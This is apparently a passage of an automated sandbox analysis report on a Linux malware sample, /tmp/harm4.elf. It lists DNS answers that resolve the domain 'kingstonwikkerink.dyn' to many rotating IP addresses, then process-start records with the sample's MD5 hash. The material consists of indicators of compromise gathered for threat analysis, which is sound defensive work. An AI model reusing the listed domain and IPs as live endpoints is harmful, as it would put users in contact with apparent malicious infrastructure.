                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET217.160.70.42192.168.2.140x4aa4No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET168.235.111.72192.168.2.140xba02No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false

                                                                                                            System Behavior

                                                                                                            Start time (UTC):07:47:57
                                                                                                            Start date (UTC):01/11/2024
                                                                                                            Path:/tmp/harm4.elf
                                                                                                            Arguments:/tmp/harm4.elf
                                                                                                            File size:4956856 bytes
                                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                            Start time (UTC):07:47:57
                                                                                                            Start date (UTC):01/11/2024
                                                                                                            Path:/tmp/harm4.elf
                                                                                                            Arguments:-
                                                                                                            File size:4956856 bytes
                                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                            Start time (UTC):07:47:57
                                                                                                            Start date (UTC):01/11/2024
                                                                                                            Path:/tmp/harm4.elf
                                                                                                            Arguments:-
                                                                                                            File size:4956856 bytes
                                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                            Start time (UTC):07:47:57
                                                                                                            Start date (UTC):01/11/2024
                                                                                                            Path:/tmp/harm4.elf
                                                                                                            Arguments:-
                                                                                                            File size:4956856 bytes
                                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1